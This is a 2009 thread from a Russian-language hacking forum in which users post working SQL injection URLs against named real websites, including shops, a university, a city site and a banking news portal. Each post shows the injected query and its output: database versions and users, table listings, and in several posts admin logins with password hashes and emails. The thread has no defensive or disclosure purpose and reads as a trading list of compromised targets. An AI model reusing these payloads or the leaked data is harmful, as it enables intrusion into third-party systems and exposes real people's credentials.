ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8251  
Старый 09.03.2009, 21:38
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.readybiz.ru/?p=projects&row_id=-99+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9--
readybiz@localhost:readybiz2:5.0.45-community

Pagerank: 0
тИЦ: 50


Код:
http://www.readybiz.ru/?p=projects&row_id=-99+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables--
Код:
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
accesslevels
contacts
forum
images
legalbiz_clients
legalbiz_clients_types
legalbiz_laws
legalbiz_laws_arb
linker_catalog
linker_links
mailing
news
project_types
projects
site_menus
site_users
sites
themes
users
vote_ankets
vote_answers
vote_questions
vote_types
vote_variants
xfields
xtables
clients
counter
counter_stats
legalbiz2_clients
legalbiz2_clients_types
legalbiz2_laws
legalbiz2_laws_arb
works
works_types
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
readybiz_clients
readybiz_clients_types
readybiz_laws
readybiz_laws_arb
contacts_spam
readybiz2_clients
readybiz2_clients_types
readybiz2_laws
readybiz2_laws_arb


--

Код:
http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,user(),database(),version())--
tokdubna@localhost:tok:5.0.51a

Pagerank: 2
тИЦ: 10

Код:
http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,table_name+from+information_schema.tables+limit+0,1--
Вывод через limit

Код:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
backups
news
readypc
shop_cart
shop_catalog
shop_description
shop_images
shop_orders
shop_price
shop_setup
site_menus
site_users
sites
users
xfields
xtables
Код:
http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,login,password,email)+from+users+limit+0,1--
jb:68fa2f3e596f4b8aae30a00aad4916e2:CodePro:jb@ila bs.ru

Код:
http://www.tokdubna.ru/new/shop.php?p=12&id=-57111+union+select+1,concat_ws(0x3a,login,password,email)+from+users+limit+1,1--
strodi:2165a70e5a5808e376b5ed564a332bf1:zaslonka:s trodi@ilabs.ru

и т.д...
 
Ответить с цитированием

  #8252  
Старый 09.03.2009, 23:24
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://www.eg.kokushikan.ac.jp/tech-j/schedule.php?type=M&y=1954&m=6+union+select+1,null ,null,null,null,null,null,null,version(),null,null--
PostgreSQL 7.3.4 on i386-redhat-linux-gnu, compiled by GCC i386-redhat-linux-gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
 
Ответить с цитированием

  #8253  
Старый 10.03.2009, 00:00
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

шоп!

Код:
http://shop.bea.vn/fun/components/truyen/read.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5--
юзер/версия/бд:

Код:
bea_fun@localhost5.0.45bea_fun

Код:
http://shop.bea.vn/fun/components/truyen/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,username,password),3,4,5+from+user--
юзер/пасс:

Код:
admin:9fb3c27488be2c154eac22aaaba5f2ea
-------------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8254  
Старый 10.03.2009, 01:29
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.ritex-t.ru/index.php?id=2&row=-13+union+select+1,2,3,concat_ ws(0x3 a,version(),database(),user()),5,6,7,8--
Database Version : 5.0.67-log
Database name : u57230
User name : u57230@10.10.10.208


все таблицы и колонки сразу, выводятся без лимита :

Код:
http://www.ritex-t.ru/index.php?id=2&row=-13+union+select+1,2,3,concat_ws(0x3a,table_name,column_name),5,6,7,8+from+INF ORMATION_SCHEM A.COLUMNS--
а вот и админы:

Код:
adminvs:8621e77d22f0830a46b462e3f46ed917
colibry:7bbd1c39b867f00d0b9512ce0331988a
nata:77369e37b2aa1404f416275183ab055f
coladmin:1e1277d611010823e083b3d8a6ac5ace
 
Ответить с цитированием

  #8255  
Старый 10.03.2009, 02:08
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://bank-ua.com/index.php?page=publishing_news&id=20200+union+select+1,2,3,4,5,6,7,8+limit+1,1/*
Version(): 5.0.32-Debian_7etch8-log
Database() bankua_db
User(): bankua_usr@localhost
 
Ответить с цитированием

  #8256  
Старый 10.03.2009, 02:16
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.letsdolunch.info/news-display.php?ID=-1+union+select+1,2,3,4,5,6,7,8/*

Database Version: 4.1.22
Database name: durhamsletsdolunch
User name: durhamsletsdolun@localhost
 
Ответить с цитированием

  #8257  
Старый 10.03.2009, 14:45
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.dapnl-pd.ro/document.php?id=-82+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12--



Database Version: 4.1.22-standard-log
Database name: dapnl_dapnl
User name: dapnl_dapnl@localhost
 
Ответить с цитированием

  #8258  
Старый 10.03.2009, 15:24
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Шопы:

Код:
http://nocona.org/shopping.php?id=-1+union+all+select+concat_ws(0x3a,version(),user(),database())+from+users--
версия/юзер/бд:

Код:
4.0.16-nt:nocona@www2.ithinc.net:nocona
есть таблица users
-----------------------------------------------------------------------

Код:
http://www.kohlrusch.biz/shop/shop_artikel_details.php4?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
версия/юзер/бд:

Код:
4.0.27-standard-log:p33764815@212.227.127.2:db69047444
-----------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8259  
Старый 10.03.2009, 15:48
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

appleservice.ru

Код:
http://www.appleservice.ru/?news_id=-1' UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14/*
Цитата:
5.0.26-log:nokiaservi_apple:nokiaservi_apple@localhost
 
Ответить с цитированием

  #8260  
Старый 10.03.2009, 16:09
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.sibiu.ro/ro2/cic/unact.php?id=-89+union+select+concat_ws(0x3a,version(),database( ),user()),2,3


Database Version: 5.0.45-Debian_1ubuntu3-log
Database name: mysql01db41
User name: mysql01db41@10.153.64.7
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ